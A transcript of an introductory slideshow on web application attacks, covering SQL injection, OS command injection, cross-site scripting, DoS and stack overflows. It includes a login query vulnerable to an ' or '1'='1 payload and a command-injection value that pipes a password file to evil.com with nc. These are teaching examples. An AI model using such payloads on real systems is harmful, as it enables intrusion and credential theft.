Web application attack Presentation
-
Upload
khoa-kieu -
Category
Technology
-
view
39 -
download
1
Transcript of Web application attack Presentation
Web Application Attack
Nguyễn Kiều Khoa
- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.
http://en.wikipedia.org/wiki/Web_application
What is a web application?
1.Injection (SQL Injection)db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'");
- Suppose the user request parameter is …' or '1'='1
- Then the query we execute is … (note that and has precedence over or)
select * from users where name='' or '1'='1' and password='whatever'
- Suppose we’re too lazy to perform DNS lookup, so we resort to the following:
- Suppose the hostname parameter is …
foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
1.Injection (OS Command)
system("nslookup " + Request["hostname"]);
- Injecting JavaScript into pages viewed by other users.
2.Cross-Site Scripting
- denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users
http://en.wikipedia.org/wiki/Denial-of-service_attack
3.DoS and DDoS
- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.
4.Stack Overflow
Q&A